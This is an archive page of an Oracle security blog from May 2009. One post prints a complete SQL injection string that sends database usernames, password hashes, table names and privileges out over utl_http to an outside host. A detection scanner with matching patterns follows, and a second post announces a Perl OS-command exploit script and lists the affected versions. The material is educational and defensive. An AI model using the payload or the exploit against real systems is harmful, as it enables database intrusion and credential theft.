You are currently in the archives of the Alexander Kornbrust Oracle Security Blog for May 2009.
Archives for May 2009
Presentation from Confidence 2009 available
16 May 2009 by Alexander Kornbrust.
I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search for credit card numbers in the database (using dbms_xmlgen), …

Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we are getting all usernames/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.
http://victim.com/order.jsp?id=17' or 1=((select
sum(length(utl_http.request('http://www.orasploit.com/'||
username||'='||password) from dba_users)))+((select
sum(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name) from dba_tables))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name||'='||column_name)) from dba_users))
+((select sum(length(utl_http.request('http://
www.orasploit.com/'||grantee||'='||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
grantee||'='||owner||'='||table_name||'='||privilege||'='||
grantable) from dba_tab_privs)))--
Posted in SQL Injection, Security, General | Print | 1 comment »
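A request like the one in the post above leaves a recognisable trace in the web server's access log. The following is an added example, not code from the presentation or the blog: a small Python scanner that decodes the query string (including nested URL encoding) and flags the indicators named in the post. The log lines, IP addresses and the host collector.example are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the post: the outbound call and the views it reads.
OUTBOUND = re.compile(r"utl_http\s*\.\s*request\s*\(", re.I)
DICT_VIEW = re.compile(r"\bdba_(users|tables|role_privs|tab_privs)\b", re.I)
SUBSELECT = re.compile(r"\(\s*select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo nested URL encoding (%2527 -> %27 -> ') for up to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the indicator names found in the query string of one log line."""
    m = REQUEST.search(line)
    if not m or "?" not in m.group(1):
        return []
    query = decode_fully(m.group(1).split("?", 1)[1])
    checks = (("outbound_call", OUTBOUND), ("dictionary_view", DICT_VIEW),
              ("subselect", SUBSELECT))
    return [name for name, rx in checks if rx.search(query)]

def scan(lines):
    """Return (line_number, indicators) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := inspect_line(line))]

# Constructed access-log lines (documentation IPs, example hostnames).
SAMPLE = [
    '192.0.2.10 - - [16/May/2009:10:00:01 +0200] "GET /order.jsp?id=17 HTTP/1.1" 200 512',
    '192.0.2.44 - - [16/May/2009:10:00:07 +0200] "GET /order.jsp?id=17%27+or+1%3D%28select'
    '+utl_http.request%28%27http%3A%2F%2Fcollector.example%2F%27%7C%7Cusername%29'
    '+from+dba_users%29-- HTTP/1.1" 200 512',
    '192.0.2.44 - - [16/May/2009:10:00:09 +0200] '
    '"GET /search.jsp?q=UTL_HTTP%252Erequest%2528%2527x%2527%2529 HTTP/1.1" 200 87',
    '192.0.2.10 - - [16/May/2009:10:00:12 +0200] "GET /search.jsp?q=how+to+select+a+tablet HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print(f"line {n}: {', '.join(hits)}")
```

The scanner only sees parameters that appear in the request line; POST bodies are normally not written to the access log and need a different data source.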
Perl - Script to run OS commands via Oracle based Web Apps released
1 May 2009 by Alexander Kornbrust.
Sumit Siddarth from www.notsosecure.com has released a small Perl script to run OS commands via Oracle-based web apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006, but all databases without this (or a higher CPU or patchset) are affected (Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2, XE). More details are available in my updated tutorial.
I tested the script together with him against several of my test databases.

The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.
At the moment the script does not work against Oracle databases without Java, but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).
Posted in Tools, Exploit, SQL Injection | Print | No comments »